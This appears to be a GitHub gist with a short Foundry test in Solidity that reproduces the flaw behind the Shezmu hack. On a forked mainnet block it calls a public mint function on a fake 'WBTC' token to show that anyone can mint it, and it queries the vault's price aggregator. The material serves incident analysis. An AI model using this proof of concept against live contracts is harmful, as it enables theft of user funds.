Created
October 7, 2024 23:34
-
-
Save devtooligan/6f110f6c8c35db15459bd67abc6aee48 to your computer and use it in GitHub Desktop.
Unsafe "WBTC" token used in Shezmu hack
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| // SPDX-License-Identifier: UNLICENSED | |
| pragma solidity ^0.8.13; | |
| import { Vm } from "forge-std/Vm.sol"; | |
| import {Test, console} from "forge-std/Test.sol"; | |
| import {Counter} from "../src/Counter.sol"; | |
| interface IERC20 { | |
| function balanceOf(address account) external view returns (uint256); | |
| function mint(address account, uint256 amount) external; | |
| } | |
| interface IValueProvider { | |
| function aggregator() external view returns (address); | |
| } | |
| contract FreeMintTest is Test { | |
| function setUp() public { | |
| _setUpFork(vm, "MAINNET_RPC", 20_793_904); | |
| } | |
| function _setUpFork(Vm vm_, string memory rpcFork, uint256 forkBlock) public { | |
| vm_.createSelectFork(vm_.envString(rpcFork), forkBlock); | |
| } | |
| IERC20 funkyWBTC = IERC20(0x641249dB01d5C9a04d1A223765fFd15f95167924); | |
| // Obtained from storage on vault | |
| IValueProvider valueProvider = IValueProvider(0xBb9758fA3ae75e3c12178cc3Ba44308AAdF84B25); | |
| function test_freemint() public { | |
| uint balBefore = funkyWBTC.balanceOf(address(this)); | |
| console.log("balBefore", balBefore); | |
| funkyWBTC.mint(address(this), 100); | |
| console.log("balAfter", funkyWBTC.balanceOf(address(this))); | |
| console.log("valueProvider.aggregator();", valueProvider.aggregator()); | |
| } | |
| } |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment